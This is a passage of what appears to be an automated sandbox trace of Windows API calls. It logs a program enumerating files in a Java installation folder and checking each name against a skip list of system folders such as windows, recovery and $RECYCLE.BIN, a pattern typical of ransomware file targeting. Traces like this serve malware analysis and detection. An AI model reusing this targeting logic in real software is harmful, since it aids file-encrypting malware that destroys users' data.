(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jdwp.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jdwp.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jdwp.dll", lpUsedDefaultChar=0x0) returned 8 [0069.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0069.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0069.701] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jfr.dll", cAlternateFileName="")) returned 1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2=".") returned 1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="..") returned 1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="...") returned 1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="windows") returned -1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="recovery") returned -1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="perflogs") returned -1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="documents and settings") returned 1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="system volume information") returned -1 [0069.701] lstrcmpiW (lpString1="jfr.dll", lpString2="msocache") returned -1 [0069.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfr.dll", lpUsedDefaultChar=0x0) returned 7 [0069.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfr.dll", lpUsedDefaultChar=0x0) returned 7 [0069.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0069.701] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22240, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jfxmedia.dll", cAlternateFileName="")) returned 1 [0069.701] lstrcmpiW (lpString1="jfxmedia.dll", lpString2=".") returned 1 [0069.701] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="..") returned 1 [0069.701] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="...") returned 1 [0069.701] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="windows") returned -1 [0069.701] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="recovery") returned -1 [0069.701] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="perflogs") returned -1 [0069.701] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="documents and settings") returned 1 [0069.702] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.702] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="system volume information") returned -1 [0069.702] lstrcmpiW (lpString1="jfxmedia.dll", lpString2="msocache") returned -1 [0069.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxmedia.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxmedia.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxmedia.dll", lpUsedDefaultChar=0x0) returned 12 [0069.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxmedia.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxmedia.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxmedia.dll", lpUsedDefaultChar=0x0) returned 12 [0069.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.702] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7511d3f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7511d3f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2794a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jfxwebkit.dll", cAlternateFileName="JFXWEB~1.DLL")) returned 1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2=".") returned 1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="..") returned 1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="...") returned 1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="windows") returned -1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="recovery") returned -1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="perflogs") returned -1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="documents and settings") returned 1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="system volume information") returned -1 [0069.702] lstrcmpiW (lpString1="jfxwebkit.dll", lpString2="msocache") returned -1 [0069.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxwebkit.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxwebkit.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxwebkit.dll", lpUsedDefaultChar=0x0) returned 13 [0069.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxwebkit.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxwebkit.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxwebkit.dll", lpUsedDefaultChar=0x0) returned 13 [0069.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.703] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jjs.exe", cAlternateFileName="")) returned 1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2=".") returned 1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="..") returned 1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="...") returned 1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="windows") returned -1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="recovery") returned -1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="perflogs") returned -1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="documents and settings") returned 1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="system volume information") returned -1 [0069.703] lstrcmpiW (lpString1="jjs.exe", lpString2="msocache") returned -1 [0069.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jjs.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jjs.exe", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jjs.exe", lpUsedDefaultChar=0x0) returned 7 [0069.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jjs.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jjs.exe", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jjs.exe", lpUsedDefaultChar=0x0) returned 7 [0069.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0069.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.703] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2aa40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jli.dll", cAlternateFileName="")) returned 1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2=".") returned 1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="..") returned 1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="...") returned 1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="windows") returned -1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="recovery") returned -1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="perflogs") returned -1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="documents and settings") returned 1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="system volume information") returned -1 [0069.703] lstrcmpiW (lpString1="jli.dll", lpString2="msocache") returned -1 [0069.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jli.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jli.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jli.dll", lpUsedDefaultChar=0x0) returned 7 [0069.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jli.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jli.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jli.dll", lpUsedDefaultChar=0x0) returned 7 [0069.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.706] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa897bfc2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x48440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jp2iexp.dll", cAlternateFileName="")) returned 1 [0069.706] lstrcmpiW (lpString1="jp2iexp.dll", lpString2=".") returned 1 [0069.706] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="..") returned 1 [0069.706] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="...") returned 1 [0069.707] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="windows") returned -1 [0069.707] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="recovery") returned -1 [0069.707] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="perflogs") returned -1 [0069.707] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="documents and settings") returned 1 [0069.707] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.707] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="system volume information") returned -1 [0069.707] lstrcmpiW (lpString1="jp2iexp.dll", lpString2="msocache") returned -1 [0069.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2iexp.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2iexp.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2iexp.dll", lpUsedDefaultChar=0x0) returned 11 [0069.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2iexp.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2iexp.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2iexp.dll", lpUsedDefaultChar=0x0) returned 11 [0069.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.707] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa897bfc2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa897bfc2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1b640, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jp2launcher.exe", cAlternateFileName="JP2LAU~1.EXE")) returned 1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2=".") returned 1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="..") returned 1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="...") returned 1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="windows") returned -1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="recovery") returned -1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="perflogs") returned -1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="documents and settings") returned 1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="system volume information") returned -1 [0069.707] lstrcmpiW (lpString1="jp2launcher.exe", lpString2="msocache") returned -1 [0069.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2launcher.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2launcher.exe", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2launcher.exe", lpUsedDefaultChar=0x0) returned 15 [0069.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2launcher.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2launcher.exe", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2launcher.exe", lpUsedDefaultChar=0x0) returned 15 [0069.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.708] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jp2native.dll", cAlternateFileName="JP2NAT~1.DLL")) returned 1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2=".") returned 1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="..") returned 1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="...") returned 1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="windows") returned -1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="recovery") returned -1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="perflogs") returned -1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="documents and settings") returned 1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="system volume information") returned -1 [0069.708] lstrcmpiW (lpString1="jp2native.dll", lpString2="msocache") returned -1 [0069.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2native.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2native.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2native.dll", lpUsedDefaultChar=0x0) returned 13 [0069.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2native.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2native.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jp2native.dll", lpUsedDefaultChar=0x0) returned 13 [0069.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.708] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jp2ssv.dll", cAlternateFileName="")) returned 1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2=".") returned 1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="..") returned 1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="...") returned 1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="windows") returned -1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="recovery") returned -1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="perflogs") returned -1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="documents and settings") returned 1 [0069.708] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.709] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="system volume information") returned -1 [0069.709] lstrcmpiW (lpString1="jp2ssv.dll", lpString2="msocache") returned -1 [0069.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2ssv.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jp2ssv.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, 